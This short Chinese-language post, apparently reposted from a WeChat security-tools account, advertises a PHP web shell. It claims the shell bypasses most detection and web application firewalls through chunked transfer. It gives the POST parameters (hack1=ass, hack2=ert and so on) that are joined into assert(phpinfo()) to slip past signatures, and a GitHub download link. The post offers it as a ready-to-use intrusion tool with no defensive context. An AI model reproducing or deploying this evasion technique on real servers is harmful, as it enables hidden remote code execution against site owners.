===================================
0x01 工具介绍
一种php-shell的新写法,它可以绕过大部分的检测,调用任意php函数,还可以用分块传输绕过waf。
0x02 安装与使用
1、使用post发送如下参数
hack1
=ass&hack2=ert&hack3=phpi&hack4=fo()&hack5=pwd
2、hack1会和hack2拼接,hack3会和hack4拼接而形成assert(phpinfo())
3、检测效果
0x03 项目链接下载
https://github.com/fsaza/php-web-shell
原文始发于微信公众号(Web安全工具库):可绕过WAF的shell -- php-web-shell(4月4日更新)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论